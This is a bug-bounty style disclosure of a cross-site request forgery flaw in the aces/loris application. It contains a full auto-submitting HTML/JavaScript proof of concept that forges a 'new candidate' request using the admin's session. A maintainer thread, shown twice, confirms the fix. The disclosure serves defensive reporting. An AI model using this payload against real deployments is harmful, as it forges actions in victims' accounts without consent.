Cross-Site Request Forgery (CSRF) in aces/loris

Valid

Reported on

Aug 17th 2021

✍️ Description

Attacker able to Create a New Candidate Profile with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can create a New Candidate Profile , this means only with visiting a site a Candidate Profile will be created.

🕵️‍♂️ Proof of Concept

1.fisrt admin already should be logged in Firefox or Safari.

2.Open the PoC.html (it is auto-submit).

3.Here a admin with DOB 1994-08-02 will be created after the PoC.html file opened.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/demo.loris.ca\/new_profile\/", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------2198388143166471250466513195");
        xhr.withCredentials = true;
        var body = "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"dobDate\"\r\n" + 
          "\r\n" + 
          "1994-08-02\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"dobDateConfirm\"\r\n" + 
          "\r\n" + 
          "1994-08-02\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"edcDate\"\r\n" + 
          "\r\n" + 
          "2021-08-12\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"edcDateConfirm\"\r\n" + 
          "\r\n" + 
          "2021-08-12\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"sex\"\r\n" + 
          "\r\n" + 
          "male\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"site\"\r\n" + 
          "\r\n" + 
          "2\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"project\"\r\n" + 
          "\r\n" + 
          "3\r\n" + 
          "-----------------------------2198388143166471250466513195\r\n" + 
          "Content-Disposition: form-data; name=\"fire_away\"\r\n" + 
          "\r\n" + 
          "New Candidate\r\n" + 
          "-----------------------------2198388143166471250466513195--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of Create a New Candidate Profile

Fix

The easiest way that you set strict attribute on each cookie. The best way is that you set a CSRF token in each endpoint.

Occurrences

index.php L1

We have contacted a member of the aces/loris team and are waiting to hear back 2 years ago

A aces/loris maintainer

commented 2 years ago

Thank you for reporting this.

After investigating, there was a bug with how the SameSite=strict attribute was being set on the session cookie which is now fixed by https://github.com/aces/Loris/pull/7539

A aces/loris maintainer marked this as fixed with commit 13df53 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

amammad

commented 2 years ago

Researcher

Your welcome, Can you validate Other reports too? :)

A aces/loris maintainer

commented 2 years ago

I think I already did, but let me know if I missed any.

amammad

commented 2 years ago

Researcher

Yah I see them :) I hope you have a good and safe programming days.... Best regards,Amammad.

to join this conversation

We have contacted a member of the aces/loris team and are waiting to hear back 2 years ago

A aces/loris maintainer

commented 2 years ago

Thank you for reporting this.

After investigating, there was a bug with how the SameSite=strict attribute was being set on the session cookie which is now fixed by https://github.com/aces/Loris/pull/7539

A aces/loris maintainer marked this as fixed with commit 13df53 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

amammad

commented 2 years ago

Researcher

Your welcome, Can you validate Other reports too? :)

A aces/loris maintainer

commented 2 years ago

I think I already did, but let me know if I missed any.

amammad

commented 2 years ago

Researcher

Yah I see them :) I hope you have a good and safe programming days.... Best regards,Amammad.

to join this conversation